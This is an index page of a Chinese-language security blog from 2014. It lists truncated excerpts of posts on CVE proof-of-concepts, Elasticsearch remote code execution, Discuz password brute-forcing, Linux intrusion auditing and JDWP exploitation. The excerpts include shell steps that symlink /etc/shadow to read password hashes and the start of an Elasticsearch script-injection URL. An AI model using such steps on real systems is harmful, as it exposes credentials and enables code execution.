cnbird's blog

cnbird's blog

CVE-2014-0246 POC

When using a GRUB bootloader password, the md5 hash of said password was collected and stored in the resulting archive of debugging information when ...

2014-05-30 12:58:25

阅读数 1081

评论数 0

CVE-2014-0199 CVE-2014-0200 CVE-2014-0201 POC

It was found that the ovirt-engine-reports setup script logged the reports database password in plain text to a world-readable file. An attacker w...

2014-05-30 12:55:12

阅读数 1038

评论数 0

CVE-2014-0243 POC

[myhost]$ pwd /var/lib/check_mk_agent/job [myhost]$ ls -l total 0 [myhost]$ ln -s /etc/shadow [myhost]$ ls -la total 4 dr...

2014-05-30 12:45:30

阅读数 1352

评论数 0

Elasticsearch 代码执行漏洞

http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22s...

2014-05-29 16:41:05

阅读数 1359

评论数 0

DZ自动爆破工具原理分析

ID:GENXOR TEAM:360网站卫士 [转载请注明出处自  :  360网站卫士博客-blog.wangzhan.360.cn] 0×01 原理分析 最近爆出关于利用社工库爆破Discuz论坛用户名密码的工具,造成很多大的论坛用户信息泄露,分析原理如下。 这里...

2014-05-19 16:26:08

阅读数 3600

评论数 0

Linux入侵审查浅谈转自2cto

1. 检查帐户 ? 1 2 3 4 5 # less /etc/passwd # grep :0: /etc/passwd(检查是否产生了新用户,和UID、GID是0的用户) # ls -l /e...

2014-05-15 17:50:23

阅读数 867

评论数 1

java漏洞分析

http://www.secniu.com/blog/page/2/ https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf

2014-05-15 17:18:40

阅读数 841

评论数 0

Insecure default in Elasticsearch enables remote code execution

Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to execute arbitrary code on visitors with Elasticsearc...

2014-05-15 16:37:21

阅读数 1847

评论数 0

f5 icontrol exploit

http://wenku.baidu.com/link?url=awoYxUopvjR9miMvaVQvgtpGDUMmjilVlaHfOuUBEliyFC7SJl-F0Pc05E_6vnBy5fSyOisTqLfrDZOG9A-z1MlOWSeIAz8cIygiSYm3Xz_

2014-05-15 14:52:27

阅读数 1221

评论数 0

大型网站系统与Java中间件实践

http://product.china-pub.com/3803691

2014-05-14 18:44:10

阅读数 1403

评论数 0

java debug 渗透测试

JDWP Arbitrary Java Code Execution Exploitation =============================================== Java Debugging Wire Protocol (JDWP) is the lowlevel p...

2014-05-13 14:07:30

阅读数 3548

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭